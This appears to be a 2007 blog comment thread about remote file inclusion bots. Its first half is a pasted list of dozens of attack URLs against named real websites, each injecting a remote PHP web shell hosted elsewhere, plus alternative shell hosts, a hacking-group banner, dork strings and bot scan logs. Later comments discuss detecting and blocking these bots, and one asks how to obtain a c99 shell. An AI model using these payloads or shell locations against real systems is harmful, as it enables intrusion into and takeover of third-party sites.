http://www.fillattice.com/modello_blue.php?file=http://az.co.cz/foto/c9.txt?
http://www.offisolution.co.kr/shop.php?goFile=http://az.co.cz/foto/c9.txt?
http://www.gbinline.org.uk/index.php?left=http://az.co.cz/foto/c9.txt?
http://www.rocknation.dk/?mainpage=http://az.co.cz/foto/c9.txt?
http://www.afterimagemedia.net/template.php?x=http://az.co.cz/foto/c9.txt?
http://www.karko.de/index2.php?page=http://az.co.cz/foto/c9.txt?
http://www.presbyconstruction.com/page.php?id=http://az.co.cz/foto/c9.txt?
http://www.transpress.bg/insidede.php?cont=http://az.co.cz/foto/c9.txt?
http://www.orthototaal.nl/template.php?template=http://az.co.cz/foto/c9.txt?
http://www.termodom.com.ua/index1.php?cur_page=http://az.co.cz/foto/c9.txt?
http://www.gylleneskor.se/interview/interview_prev.php?display=http://az.co.cz/foto/c9.txt?
http://www.mchead.net/portfolio.php?port=http://az.co.cz/foto/c9.txt?
http://www.francadibenedetto.com/index.php?page=http://az.co.cz/foto/c9.txt?
http://www.kubestahl.de/index2.php?language=http://az.co.cz/foto/c9.txt?
http://www.linz24.at/index.php?site=http://az.co.cz/foto/c9.txt?
http://www.chuvavasco.com/main.php?header=http://az.co.cz/foto/c9.txt?
http://www.blogs.com.br/dicas/index.php?id=http://az.co.cz/foto/c9.txt?
http://www.nordinbatik.com/main2.php?p=http://az.co.cz/foto/c9.txt?
http://www.lndnoticias.com.ar/html/modules/My_eGallery/public/displayCategory.php?basepath=http://az.co.cz/foto/c9.txt?
http://www.enneciesse.com/Sum/index2.php?var=http://az.co.cz/foto/c9.txt?
http://www.city-hunter.it/tamburi/index2.php?cont=http://az.co.cz/foto/c9.txt?
http://www.ascherslebener.de/index2.php?inhalt=http://az.co.cz/foto/c9.txt?%00
http://singmitsommer.de/index2.php?inhalt=http://az.co.cz/foto/c9.txt?=%00
http://www.ascherslebener.de/index2.php?inhalt=http://az.co.cz/foto/c9.txt?=%00&eintrag_start=0
http://www.bg-sektion-harz.de/index2.php?inhalt=http://az.co.cz/foto/c9.txt?=%00
http://www.partyandmore.net/index2.php?action=http://az.co.cz/foto/c9.txt?=%00
http://www.performance-analysis.com/index2.php?action=http://az.co.cz/foto/c9.txt?=%00
http://www.kennerly.com/fineart/index2.php?page=http://az.co.cz/foto/c9.txt?=%00
http://www.mohiulislam.com/index2.php?page=text/history.php&rlink=http://az.co.cz/foto/c9.txt?=%00&rpic=rlink/rpic_history.php
http://www.mohiulislam.com/index2.php?page=text/history.php&rlink=rlink/rlink_profile.php&rpic=http://az.co.cz/foto/c9.txt?=%00
http://www.dynamicssoftware.com/index2.php?page=Home%20page&sub=http://az.co.cz/foto/c9.txt?=%00&content=13
http://www.dynamicssoftware.com/index2.php?page=Home%20page&sub=http://az.co.cz/foto/c9.txt?=%00&content=12
http://www.davidkennerly.com/fineart/index2.php?page=http://az.co.cz/foto/c9.txt?=%00
http://www.godwinbooks.com/index2.php?page=http://az.co.cz/foto/c9.txt?=%00
http://www.abbotthillramblers.com/index2.php?page=http://az.co.cz/foto/c9.txt?=%00
http://pacelighting.com/index2.php?page=http://az.co.cz/foto/c9.txt?=%00
http://mbenazet2.free.fr/index2.php?page=http://az.co.cz/foto/c9.txt?=%00
http://www.irctrials.com/sponsors/index2.php?page=http://az.co.cz/foto/c9.txt?=%00
http://www.harmaraccess.com/index2.php?page=http://az.co.cz/foto/c9.txt?=%00
http://www.ohioschoolplan.org/index2.php?page=http://az.co.cz/foto/c9.txt?=%00
http://www.orbitedu.com/index2.php?page=http://az.co.cz/foto/c9.txt?=%00&name=Sunday%20Test
http://www.andrubemis.com/index2.php?page=http://az.co.cz/foto/c9.txt?=%00
http://www.chestnutgrove.wandsworth.sch.uk/index2.php?page=http://az.co.cz/foto/c9.txt?=%00&name=Admissions
http://www.royvervoort.nl/vieux-sarrazac/index2.php?language=nl&content=http://az.co.cz/foto/c9.txt?=%00&SubMenu=0
http://www.klidapohoda.cz/index2.php?x=http://az.co.cz/foto/c9.txt?=%00
http://absolute-destiny.net/music/index2.php?x=http://az.co.cz/foto/c9.txt?=%00
http://sc.absolute-destiny.net/index2.php?x=http://az.co.cz/foto/c9.txt?=%00
http://www.infocentrum.opava.cz/index2.php?file=http://az.co.cz/foto/c9.txt?=%00&menu=4
http://www.intensecaraudio.net/index2.php?site=http://az.co.cz/foto/c9.txt?=%00
http://www.pmd-webdesign.de/gfxroom2/index2.php?site=http://az.co.cz/foto/c9.txt?=%00&i=0
http://www.monnerecher-musek.net/index2.php?site=http://az.co.cz/foto/c9.txt?=%00
http://www.schulen.li/rss/schulseite/index2.php?site=http://az.co.cz/foto/c9.txt?=%00
http://www.neptun-club.com.ua/index2.php?dir=http://az.co.cz/foto/c9.txt?=%00
http://www.dorisankarberg.se/index2.php?dir=http://az.co.cz/foto/c9.txt?=%00
http://nagelstudio-overberg.de/index2.php?dat=http://az.co.cz/foto/c9.txt?=%00
http://www.gemeinde-gerwisch.de/index2.php?link=http://az.co.cz/foto/c9.txt?=%00
http://www.consultyou.ch/index2.php?link=http://az.co.cz/foto/c9.txt?=%00&link2=About%20us
http://www.galaentertainment.se/index2.php?link=http://az.co.cz/foto/c9.txt?=%00
([if That CMD Doen’t Work Wuse This:=> rocksv.com/c99.txt? az.co.cz/foto/c9.txt? phpshell.mackatack.com/source.txt? andravarldar.se/cmd? http://vh1.srt.com.cn/sewam/c99.txt? ])
#*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*#
#VuLNeRaBiLiTY SHELLZ By ALBANIA.SECURITY.CLAN STAFF @ IRC.FIER1.COM - IRC.UNIXHELL.COM - IRC.FIERICLAN.NET ) #
#*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*#
IRC.UNIXHELL.COM
THE BEST WORLD OF A NEW STYLE OF LIFE 100% PUR ILLEGAL SHAKING
June 13th, 2007 at 7:10 am
http://www.xshqiptaretx.org/x0rLzalboZ/stringvuln.txt
STRINGS THERE
!scan /surveys/survey.inc.php?path= inurl:surveys
!scan index.php?body= inurl:”index.php?body=”
(@Started)[Scanning] Dork: inurl:surveys
(@Searching Altavista:0 Sites)
(@Searching GOOGLE:168 Sites)
(@Searching Yahoo:0 Sites)
(@Scan)(Total:1111 Sites)
(@Scan)(websearch:24 Sites)
(@Searching Altavista:301 Sites)
(@Searching GOOGLE:307 Sites)
(@Searching Yahoo:0 Sites)
(@Scan)(Total:1929 Sites)
(@Scan)(websearch:530 Sites)
June 13th, 2007 at 11:17 am
Those are easy to detect. I logged them also; they all use:
- libwwwperl *.*
- Java user-agent.
99% of them are blocked upon entry on my site. I like clean logs.
June 13th, 2007 at 5:25 pm
I still get the daily requests, and after reading this thread, I’m going to try sil’s mod_security idea.
Thanks for the trackback.
June 19th, 2007 at 11:52 am
I have noticed that we have been getting a lot of these scripts relaying through my server and was wondering if you knew where I could redirect these bastards.
June 19th, 2007 at 2:23 pm
I dunno, I’m up for suggestions. We could create a collection of them, to start blackhole-ing them. Something you could quickly upload to openDNS or your firewall.
June 19th, 2007 at 11:27 pm
RSnake,
We’re down to figure out a nice way of making this safe and effective. In fact, I would mind running some ideas that we’re tossing about with you. Dealing with dynamic IPs is problematic sometimes and it becomes more of an issue as we provide more security-related services.
-davidu
June 20th, 2007 at 11:13 am
Yah, David, drop me an email or something.
June 20th, 2007 at 1:32 pm
I have come up with a similar script that seems to deter these scripts
setTimeout("trapDiv = new Div(); trapDiv.id = 'div'+id; trapDiv.height = parseInt(id / 1000); trapDiv.innerHTML='while (z.length '; ", 2000);
June 23rd, 2007 at 2:53 am
Can you give me this kind of bots?
(@Started)[Scanning] Dork: inurl:surveys
(@Searching Altavista:0 Sites)
(@Searching GOOGLE:168 Sites)
(@Searching Yahoo:0 Sites)
??
September 13th, 2007 at 1:30 pm
Man, I am in love with this forum. Is there anybody that can teach me how to hack a c99 shell or how to get mine? Thx very much.
October 3rd, 2007 at 10:06 am
PHP Include attacks
There is a class of vulnerabilities known as PHP Include. In this case we are talking about Remote PHP Include (Remote File Inclusion, RFI), and RFI attacks are correspondingly carried out using…